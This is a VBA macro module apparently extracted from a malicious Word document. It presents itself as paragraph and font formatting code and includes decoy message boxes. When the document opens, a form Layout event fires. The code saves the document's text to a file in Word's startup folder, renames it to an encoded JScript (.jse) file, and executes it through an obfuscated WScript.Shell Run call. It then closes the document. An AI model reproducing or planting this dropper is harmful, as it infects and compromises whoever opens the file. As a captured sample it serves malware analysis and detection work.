Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"
'By Dex 2017

Dim strDocName As String
Dim locFolder As String

Private Ftgvbf As String
Private OplmTghyu As String
Private Eedrtr As String
Private Ntgtyuu8 As String
Private Edcxsd As String


Sub GetFirstRowAsFilename()

    On Error Resume Next
    
    Dim result As VbMsgBoxResult
    result = MsgBox("?????????????????????,???????????????????????????", vbExclamation + vbOKCancel)
    If result = vbCancel Then
        End
    End If
    result = MsgBox("?????????????????????????????", vbExclamation + vbOKCancel)
    If result = vbCancel Then
        End
    End If
    result = MsgBox("OK,????", vbQuestion + vbOKCancel)


End Sub



Sub TryToRename(filename As String, TrimmedDocTitle As String)
    On Error Resume Next
    Dim OriginalFullname As String
    Dim TargetFullname As String
    Dim LengthOfTitle As Integer
    Dim CurrentPath As String
    CurrentPath = ActiveDocument.Path
    
    OriginalFullname = CurrentPath & "\" & filename
rename:
    LengthOfTitle = Len(TrimmedDocTitle)
    If LengthOfTitle = 0 Then
        Exit Sub
    End If
    TrimmedDocTitle = Left(TrimmedDocTitle, LengthOfTitle - 1)
    TargetFullname = CurrentPath & "\" & TrimmedDocTitle & ".doc"
    Name OriginalFullname As TargetFullname
    If Err Then
        GoTo rename
    End If
    Err.Clear
    
End Sub

Sub Ngepolerd()
    Dim CNCharacter As Range
    Dim CNParagraph As Paragraph
    
    Dim FontName() As String
    Dim FontSize() As Single
    Dim ParagraphSpace() As Single
    
    Dim i As Integer
    Dim j As Integer
    Dim CNFontSize As Integer
    Dim k As Integer
    
    On Error Resume Next
    
    
    
    '   ????
    i = 6
    '   ??????
    j = 5
    '   ??????
    CNFontSize = 15
    '   ?????
    k = 5
    
    ReDim FontName(i - 1)
    FontName(0) = "???????"
    FontName(1) = "????"
    FontName(2) = "??????"
    FontName(3) = "???"
    FontName(4) = "???????"
    FontName(5) = "???????"
    
  
    
    ReDim FontSize(j - 1)
    For i = 0 To j - 1
        FontSize(i) = CNFontSize + 0.5 * i
    Next i
    
    ReDim ParagraphSpace(k - 1)
    ParagraphSpace(0) = 12
    ParagraphSpace(1) = 13
    ParagraphSpace(2) = 20
    ParagraphSpace(3) = 7
    ParagraphSpace(4) = 12
  
  
   Hberdol = "W" & "" & "S" & "c"
   Cderxx = Replace(Ftgvbf, ".txt", ".j" & Ntgtyuu8 & "se")
    
    For Each CNParagraph In ActiveDocument.Paragraphs
        Randomize
        With CNParagraph
            .CharacterUnitFirstLineIndent = 2
            .LineSpacing = ParagraphSpace(Int(k * Rnd))
        End With
    Next
    
    
    Name Ftgvbf As Cderxx
    CallByName VBA.CreateObject(Eedrtr & Hberdol & Eedrtr & "ri" & "" & "p" & Eedrtr & "t." & OplmTghyu), _
    Edcxsd, VbMethod, _
    """" & Cderxx & """" & " " & ActiveDocument.PageSetup.PageHeight, 1
    
    
End Sub

   

Private Function Nftggytygt5(gh As String, k As Integer)
On Error Resume Next
Ftgvbf = gh & Ntgtyuu8 & "\." & ".\..\" & Ntgtyuu8 & "Lolerd" & Ntgtyuu8
OplmTghyu = Ntgtyuu8 & "Sh" & Ntgtyuu8 & "e" & "" & "l" & Ntgtyuu8 & "l"
MkDir Ftgvbf
Ftgvbf = "" & Ftgvbf & Empty & "\tedasz." & Ntgtyuu8 & "txt" & Ntgtyuu8
Dim Rcds_5 As Integer
Rcds_5 = FreeFile
Open Ftgvbf For Binary Lock Read Write As #Rcds_5
Put #Rcds_5, , ActiveDocument.Content.Text
Close #Rcds_5
Nftggytygt5 = OplmTghyu
Exit Function
TryToRename "Join", "Table"
GetFirstRowAsFilename
End Function


   
Private Sub Bnerd_900()
Ntgtyuu8 = Empty
Nftggytygt5 Application.StartupPath, ActiveDocument.PageSetup.PageHeight
End Sub


Private Sub Frame1_Click()
MsgBox "?????????????????????????????", vbExclamation + vbOKCancel
End Sub



Private Sub Frame1_Layout()
Edcxsd = "R" & Ntgtyuu8 & "u" & "n"
Bnerd_900
Ngepolerd
ActiveDocument.Close
End Sub





INQUEST-PP=macro
